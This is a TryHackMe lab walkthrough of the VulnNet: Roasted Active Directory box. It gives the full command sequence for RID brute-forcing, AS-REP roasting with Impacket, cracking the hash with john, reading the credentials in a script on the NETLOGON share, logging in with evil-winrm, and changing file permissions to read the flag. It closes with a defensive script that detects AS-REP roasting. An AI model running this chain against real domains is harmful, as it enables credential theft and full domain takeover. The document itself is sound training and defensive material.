TryHackMe - VulnNet Roasted - Walkthrough

Introduction

Today we're going to be doing a walkthrough for the VulnNet: Roasted room hosted at https://tryhackme.com/room/vulnnetroasted . For this walkthrough, we'll be using two virtual machines (VMs): a Kali Linux VM as our attacking machine, and the deployed Windows client as the victim machine. After we're given the IP address of the server, we assign it the alias vulnnet-roasted.thm.

The first thing we'll do is fire off an Nmap scan.

nmap -Pn -p-10000 -T4 vulnnet-roasted.thm

nmap -Pn -T4 -sV -sC -p53,88,135,139,389,445,464,593,636,3268,3269,9389 vulnnet-roasted.thm

The open ports (DNS, Kerberos, LDAP/LDAPS, global catalog, AD Web Services) show this server is domain joined, and since it is the only (we assume) domain joined server on the network, we can assume that it is also the Domain Controller. Let's test whether we can enumerate usernames from the server by RID brute-forcing with Crackmapexec:

crackmapexec smb vulnnet-roasted.thm -u guest -p '' --rid-brute

Because the guest account was not disabled on the server, we were able to enumerate a number of usernames. We save these names to a file and attempt AS-REP roasting using the Impacket GetNPUsers.py script:

python3 /opt/impacket/examples/GetNPUsers.py VULNNET-RST/ -dc-ip vulnnet-roasted.thm -no-pass -usersfile /home/kali/walks/thm/vulnNet-roasted/user.txt -request -format john -outputfile asrep.hash -debug | tee getnpusers.log

Now to check whether we received any AS-REP hashes.

cat asrep.hash

It looks like we got the t-skid user's hash. Let's crack it with John:

john --wordlist=/usr/share/wordlists/rockyou.txt asrep.hash

John cracked the hash. Let's check if these credentials are valid by accessing the SMB shares with the account:

smbclient -L //vulnnet-roasted.thm/ -U 't-skid'
# enter the password John cracked when prompted

There are a few different shares available, but the one we want is the NETLOGON share:

smbclient //vulnnet-roasted.thm/NETLOGON/ -U 't-skid'
# same password as before

We'll just download this interesting-looking file:

get ResetPassword.vbs

When we read the file, we find some credentials:

cat ResetPassword.vbs

We'll check the validity of these credentials using Crackmapexec:

crackmapexec smb vulnnet-roasted.thm -u 'a-whitehat' -p 'capturedPassword'

The Crackmapexec output indicates that not only are these credentials valid, but it seems that the a-whitehat user is an Administrator on the system. Let's try logging in with Evil-WinRM:

evil-winrm -i vulnnet-roasted.thm -u 'a-whitehat' -p 'capturedPassword'

Capturing the User Flag

The user flag on this system is located in the enterprise-core-vn user's desktop directory:

type c:\users\enterprise-core-vn\desktop\user.txt

Privilege Escalation

Crackmapexec reported that the a-whitehat user was an admin on the system, and we can see the system.txt flag file in the Administrator's Desktop directory, but we are unable to read it. Time to check out our user account's details:

net users a-whitehat

Capturing the System Flag

As a member of the Domain Admins group, our user account can change file permissions for any file on the system, so we'll do just that to read the system.txt flag.

cacls c:\users\administrator\desktop\system.txt /e /p Everyone:f
type c:\users\administrator\desktop\system.txt

Summary

The server, which also acts as a Windows Active Directory Domain Controller, had its guest user account enabled, which allowed username enumeration via SMB RID brute-forcing. Once a list of usernames was assembled, we found that one of the user accounts was vulnerable to AS-REP roasting, and so we could use that account to access an SMB share which contained a file with credentials in it. With these new credentials, we were able to log in to the server through the WinRM service. Once there, we found that the user account we captured was a Domain Admins group member, so we used its privileges to capture our objective flag files.
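The two misconfigurations this chain rests on (an enabled Guest account and an account with Kerberos pre-authentication disabled) are both visible to a defender before anyone roasts anything. The following is an added example, not part of the original walkthrough or any TryHackMe material: it audits constructed userAccountControl values for those two flags and flags the AS-REP roasting signature in constructed Security event 4768 records (no pre-auth data, RC4 ticket, success). The account names reuse the ones from this write-up; the event field values and the IP addresses are assumptions.

```python
# userAccountControl bits as defined in MS-ADTS.
ACCOUNTDISABLE = 0x0002
DONT_REQ_PREAUTH = 0x400000

# Constructed LDAP export rows (sAMAccountName -> userAccountControl),
# not values taken from the room.
SAMPLE_UAC = {
    "Guest": 0x10200,       # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD, not disabled
    "t-skid": 0x410200,     # same, plus DONT_REQ_PREAUTH: AS-REP roastable
    "a-whitehat": 0x10200,
}

# Constructed Security event 4768 (Kerberos TGT requested) records. The
# roasting request is the one with PreAuthType 0 (no pre-auth data sent),
# an RC4-HMAC ticket (0x17, the encryption john cracks) and Status 0x0.
SAMPLE_4768 = [
    {"TargetUserName": "t-skid", "IpAddress": "10.10.14.5",
     "TicketEncryptionType": "0x17", "PreAuthType": "0", "Status": "0x0"},
    {"TargetUserName": "a-whitehat", "IpAddress": "10.10.10.20",
     "TicketEncryptionType": "0x12", "PreAuthType": "2", "Status": "0x0"},
    {"TargetUserName": "enterprise-core-vn", "IpAddress": "10.10.10.21",
     "TicketEncryptionType": "0x17", "PreAuthType": "2", "Status": "0x0"},
]


def uac_findings(accounts):
    """Return (account, finding) pairs for the two weaknesses in this room."""
    findings = []
    for name, uac in accounts.items():
        if uac & DONT_REQ_PREAUTH:
            findings.append((name, "pre-authentication not required (AS-REP roastable)"))
        if name.lower() == "guest" and not (uac & ACCOUNTDISABLE):
            findings.append((name, "Guest enabled (allows anonymous RID brute-forcing)"))
    return findings


def asrep_roast_hits(events):
    """Accounts that were issued an RC4 TGT without any pre-authentication."""
    return sorted({
        e["TargetUserName"] for e in events
        if e["Status"] == "0x0" and e["PreAuthType"] == "0"
        and e["TicketEncryptionType"] == "0x17"
    })


if __name__ == "__main__":
    for account, finding in uac_findings(SAMPLE_UAC):
        print(f"[UAC] {account}: {finding}")
    for account in asrep_roast_hits(SAMPLE_4768):
        print(f"[4768] AS-REP roasting signature for {account}")
```

Clearing the pre-auth flag on t-skid and disabling Guest removes both footholds; the 4768 check is the detection to keep running afterwards.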

Finish
